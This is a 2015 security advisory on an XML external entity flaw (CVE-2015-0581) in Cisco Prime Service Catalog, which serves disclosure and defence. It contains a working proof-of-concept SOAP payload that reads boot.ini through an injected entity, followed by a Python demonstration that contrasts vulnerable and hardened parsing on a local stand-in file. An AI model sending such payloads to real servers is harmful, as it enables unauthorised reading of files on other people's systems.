Advisory February 9, 2015

Obrela Security Industries Advisory (OSI-1501)

Advisory ID 

OSI-1501

Description:

The XML parser of Cisco Prime Service Catalog processes external entities declared in a document's DTD (XML External Entity, XXE). An authenticated remote attacker can exploit this to cause a denial of service condition (resource consumption) or to read files and list directories on the underlying host (local data access).

Researcher:

Alexis Dimitriadis (a.dimitriadis[a t]obrela[do t]com)

Vulnerability:

CVE-2015-0581: Cisco Prime Service Catalog XML External Entity Processing Vulnerability
CVSS Base Score: 7.0, CVSS Temporal Score: 5.8

Identification date:

09/06/2014

Solution – fix & patch:

Cisco has released Prime Service Catalog 10.1 as well as a patch for 9.4.1, 9.4.1R2, 10.0, and 10.0R2 to remediate this vulnerability.

References:

Mitre entry: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0581

Cisco advisory: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-psc-xmlee

PoC:

The following PoC reads the local file boot.ini on the host underneath the application: an external entity pointing at the file is declared in the DOCTYPE of a SOAP request to ServiceManagerTaskService and referenced in the Username field of the authentication token, where the parser expands it. Directories can be listed the same way by pointing the entity at a directory instead of a file.

Url:

/RequestCenter/services/ServiceManagerTaskService

Post data:

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY varname SYSTEM "file:///C:/boot.ini">]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:req="http://smtask.api.newscale.com">
<soapenv:Header><req:AuthenticationToken>
<req:Username>username&varname;</req:Username><req:Password>password</req:Password>
</req:AuthenticationToken></soapenv:Header>
<soapenv:Body><req:getAuthorizationsForUser>
<req:userLoginName>username</req:userLoginName><req:startRow>0</req:startRow>
<req:numberOfRows>9999</req:numberOfRows><req:status>1</req:status>
<req:viewType>2</req:viewType>
</req:getAuthorizationsForUser></soapenv:Body></soapenv:Envelope>
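Added example (not code from the advisory, from Obrela or from Cisco): a Python script using the standard-library xml.sax parser that reproduces the mechanism of the PoC locally. It builds a request of the same shape, points the entity at a constructed stand-in for boot.ini written to a temporary file (an assumption; no Cisco host is contacted), parses it with external general entities enabled, which mirrors the vulnerable parser behaviour, and then parses it again with the hardened settings: entity resolution disabled and any DOCTYPE rejected. The names parse_auth_token, AuthTokenHandler and DoctypeSpotter are the example's own. The resource-consumption (denial of service) side of the advisory is not demonstrated here.

```python
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax import handler
from xml.sax.handler import ContentHandler

# Constructed stand-in for C:\boot.ini (assumption: not a real appliance file).
SECRET_FILE_CONTENT = (
    b"[boot loader]\ntimeout=30\n"
    b"default=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n"
)
USERNAME_TAG = "req:Username"
PASSWORD_TAG = "req:Password"


def write_secret_file() -> str:
    """Create the file the external entity will point at; return its path."""
    fd, path = tempfile.mkstemp(prefix="boot", suffix=".ini")
    with os.fdopen(fd, "wb") as fh:
        fh.write(SECRET_FILE_CONTENT)
    return path


def build_poc_request(target_path: str) -> bytes:
    """Same shape as the advisory's POST body: entity declared in the internal
    DTD subset, referenced inside <req:Username>."""
    file_url = Path(target_path).as_uri()  # file:///tmp/... on POSIX
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<!DOCTYPE foo [<!ENTITY varname SYSTEM "' + file_url + '">]>'
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"'
        ' xmlns:req="http://smtask.api.newscale.com">'
        '<soapenv:Header><req:AuthenticationToken>'
        '<req:Username>username&varname;</req:Username>'
        '<req:Password>password</req:Password>'
        '</req:AuthenticationToken></soapenv:Header>'
        '<soapenv:Body/></soapenv:Envelope>'
    ).encode("utf-8")


class AuthTokenHandler(ContentHandler):
    """Collects the text of the username and password elements."""

    def __init__(self):
        super().__init__()
        self.fields = {USERNAME_TAG: "", PASSWORD_TAG: ""}
        self._current = None

    def startElement(self, name, attrs):
        if name in self.fields:
            self._current = name

    def characters(self, content):
        # Text expanded from an external entity is delivered here as well.
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        if name == self._current:
            self._current = None


class DoctypeRejected(Exception):
    pass


class DoctypeSpotter:
    """Minimal lexical handler: stops the parse as soon as a DOCTYPE appears."""

    def __init__(self, reject: bool):
        self.reject = reject
        self.saw_doctype = False

    def startDTD(self, name, public_id, system_id):
        self.saw_doctype = True
        if self.reject:
            raise DoctypeRejected(name)

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def parse_auth_token(xml_bytes: bytes, resolve_external_entities: bool,
                     reject_doctype: bool = False):
    """Return the token fields, or None when the request is refused."""
    parser = xml.sax.make_parser()
    content = AuthTokenHandler()
    parser.setContentHandler(content)
    parser.setProperty(handler.property_lexical_handler, DoctypeSpotter(reject_doctype))
    # True reproduces the vulnerable configuration: SYSTEM entities are fetched.
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    try:
        parser.parse(io.BytesIO(xml_bytes))
    except DoctypeRejected:
        return None
    return dict(content.fields)


def run_demo() -> dict:
    path = write_secret_file()
    try:
        request = build_poc_request(path)
        return {
            "vulnerable": parse_auth_token(request, resolve_external_entities=True),
            "hardened": parse_auth_token(request, resolve_external_entities=False),
            "strict": parse_auth_token(request, False, reject_doctype=True),
        }
    finally:
        os.unlink(path)
```

In the vulnerable run the Username field comes back as the literal "username" followed by the whole contents of the file; in the hardened run it is just "username"; the strict run refuses the request at the DOCTYPE. For a Java application the equivalent of the strict run is setting the parser feature http://apache.org/xml/features/disallow-doctype-decl to true (and, where a DTD must be tolerated, disabling external-general-entities and external-parameter-entities).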